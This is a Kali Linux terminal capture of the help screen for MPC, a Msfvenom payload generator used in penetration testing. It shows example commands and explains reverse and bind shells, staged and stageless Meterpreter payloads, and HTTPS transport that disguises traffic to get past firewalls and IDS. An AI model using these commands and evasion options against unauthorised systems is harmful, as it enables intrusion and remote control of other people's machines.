- root@kali:~# mpc
- [*] Msfvenom Payload Creator (MPC v1.3.2)
- [i] Missing type
- [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
- [i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP.
- [i] /usr/bin/mpc elf bind eth0 4444 # Linux, eth0's IP & manual port.
- [i] /usr/bin/mpc stageless cmd py https # Python, stageless command prompt.
- [i] /usr/bin/mpc verbose loop eth1 # A payload for every type, using eth1's IP.
- [i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
- [i] /usr/bin/mpc help verbose # Help screen, with even more information.
- [i] <TYPE>:
- [i] + ASP
- [i] + ASPX
- [i] + Bash [.sh]
- [i] + Java [.jsp]
- [i] + Linux [.elf]
- [i] + OSX [.macho]
- [i] + Perl [.pl]
- [i] + PHP
- [i] + Powershell [.ps1]
- [i] + Python [.py]
- [i] + Tomcat [.war]
- [i] + Windows [.exe]
- [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
- [i] Missing <DOMAIN/IP> will default to the IP menu.
- [i] Missing <PORT> will default to 443.
- [i] <CMD> is a standard/native command prompt/terminal to interactive with.
- [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
- [i] Missing <CMD/MSF> will default to <MSF> where possible.
- [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
- [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
- [i] Missing <BIND/REVERSE> will default to <REVERSE>.
- [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
- [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
- [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
- [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
- [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
- [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
- [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
- [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
- [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
- [i] <LOOP> will just create one of each <TYPE>.
- [i] <VERBOSE> will display more information.
- root@kali:~#